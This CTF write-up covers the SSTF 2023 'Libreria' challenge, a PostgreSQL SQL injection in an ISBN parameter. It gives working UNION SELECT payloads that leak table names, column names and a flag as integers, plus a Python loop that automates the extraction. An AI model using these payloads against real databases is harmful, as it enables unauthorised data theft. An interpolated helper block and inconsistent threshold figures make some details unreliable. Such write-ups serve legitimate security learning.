2023 SSTF - Libreria

LittleDev0617 2023. 8. 21. 11:45

SQL injection problem.

We can ask to buy a book by ISBN.

In the source code, the ISBN is concatenated directly into the SQL query instead of being passed as a bound parameter.

We can read any information from the database with UNION SELECT, but the injected row has to come back as an isbn >= 10000000000.

Here is my SQLi query to get a table name.

23' UNION SELECT ('x' || encode(right(table_name, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT (row_number() over()) AS rownum, table_name FROM information_schema.tables) as tb WHERE rownum=1 -- 

First we need to get table names, column names, in fact any information, as an integer because of the isbn >= 1000000000 condition.
So I convert a string to an int. The server uses PostgreSQL, so I use this chain:
8 bytes of string -> bytea -> hex encode -> bit(64) -> bigint
Prefixing the hex with 'x' makes PostgreSQL parse the text as a hex bit-string literal, and bit(64)::bigint then reinterprets those 64 bits as a signed integer.

So with this query we can get table_name with setting rownum.

>>> bytes.fromhex(hex(7236556099291081849)[2:])
b'dminonly'
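To make the conversion chain concrete, here is an added Python emulation (not part of the original writeup) of what the PostgreSQL cast does to a chunk of up to 8 bytes, and the reverse decoding used above and in the flag loop; it also covers the two edge cases that appear in the final flag, the zero-padded short last chunk and a signed bigint.

```python
# Emulates  ('x' || encode(s::bytea, 'hex'))::bit(64)::bigint  and its inverse.
# Assumption (from PostgreSQL semantics): a short hex literal cast to bit(64)
# is zero-padded on the right, and bit(64)::bigint is a signed reinterpretation.

def str_to_isbn(chunk) -> int:
    """Value the injected query returns for a chunk of at most 8 bytes."""
    raw = chunk if isinstance(chunk, bytes) else chunk.encode()
    if len(raw) > 8:
        raise ValueError("bit(64) holds at most 8 bytes; use substring(..., 8)")
    # A 5-byte tail becomes 5 bytes followed by three \x00 bytes.
    padded = raw.ljust(8, b'\x00')
    # bigint is signed: a first byte >= 0x80 comes back negative.
    return int.from_bytes(padded, 'big', signed=True)

def isbn_to_bytes(isbn: int) -> bytes:
    """Recover the 8 bytes from the number shown on the book page."""
    return isbn.to_bytes(8, 'big', signed=True)

def decode_flag(isbns) -> str:
    """Join chunks read with substring(value, 1 + 8*i, 8); strip the padding."""
    return b''.join(isbn_to_bytes(n) for n in isbns).rstrip(b'\x00').decode()
```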

Yes, there is an 'adminonly' table (right(table_name, 8) drops the leading 'a').

Let's get the column names of the 'adminonly' table.

23' UNION SELECT ('x' || encode(left(column_name, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT (row_number() over()) AS rownum, column_name, table_name FROM information_schema.columns WHERE table_name='adminonly') as tb WHERE tb.rownum=1 -- 

Changing rownum to 1, 2, 3 gives the 'idx', 'key' and 'value' columns.

To find the flag we need to read the value column of every row.

23' UNION SELECT ('x' || encode(substring(value, 1, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT value FROM adminonly WHERE idx=2) as tb -- 

At idx=2 the flag appeared.

from requests import get

url = "http://CHALLENGE_HOST/?isbn="  # placeholder: the endpoint is not given in the writeup
for i in range(10):  # substring() is 1-indexed, so read offsets 1, 9, 17, ...
    r = get(url + f"23' UNION SELECT ('x' || encode(substring(value, {i*8+1}, 8)::bytea, 'hex'))::bit(64)::bigint as isbn FROM (SELECT value FROM adminonly WHERE idx=2) as tb -- ", timeout=5)
    isbn = int(r.text.split('book(')[1].split(')')[0])  # the number shown on the book page
    # mask to 64 bits because bigint is signed; bit(64) zero-pads the short last chunk
    print((isbn & (2**64 - 1)).to_bytes(8, 'big').decode(), end='')
# SCTF{SQL_i5_4_l4n9uage_t0_man4G3_d4ta_1n_Da7aba$e5}\x00\x00\x00\x00

The loop above (as I first wrote it, it did not run cleanly) shows how to pull the whole flag out 8 bytes at a time; the trailing \x00 bytes are the bit(64) padding of the last chunk.
